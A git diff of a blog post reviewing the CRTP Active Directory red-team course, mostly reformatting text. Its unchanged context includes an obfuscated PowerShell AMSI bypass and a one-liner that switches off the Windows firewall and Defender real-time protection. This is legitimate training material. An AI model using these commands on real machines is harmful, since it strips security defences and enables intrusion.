--- a/_posts/2022-12-09-crtp.md
+++ b/_posts/2022-12-09-crtp.md
@@ -6,7 +6,9 @@ date: 13-11-2022
 categories: Blog
 ---
 
-Recently I passed the Certified Red Team Professional (CRTP) which was an excellent course provided by Pentester Academy. The course is all focused on Active Directory hacking but instead of using Kali we instead use a Windows box to priv esc and move around the AD network with the help of PS Remoting mainly. The best part about this course is we are working in an environment with MS Defender and AMSI scanning in place so although being stealthy (aka Red Teaming) isn't a requirement it is necessary to bypass these restrictions.
+Recently I passed the Certified Red Team Professional (CRTP) which was an excellent course provided by Pentester Academy. The course is all focused on Active Directory hacking but instead of using Kali we instead use a Windows box to priv esc and move around the AD network with the help of PS Remoting mainly. 
+
+The best part about this course is we are working in an environment with MS Defender and AMSI scanning in place so although being stealthy (aka Red Teaming) isn't a requirement it is necessary to bypass these restrictions.
 
 The course consists of the following sections but to be honest for the exam the 'Defenses' topics aren't required:
 
@@ -28,9 +30,7 @@ One of the key things when going from box to box I learned is how to disable AMS
 S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
 {% endhighlight %}
 
-**Disable Multiple Things:**
-
-
+**Disable AV & Open Firewall:**
 {% highlight powershell %}
 Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableRealtimeMonitoring $true
 {% endhighlight %}
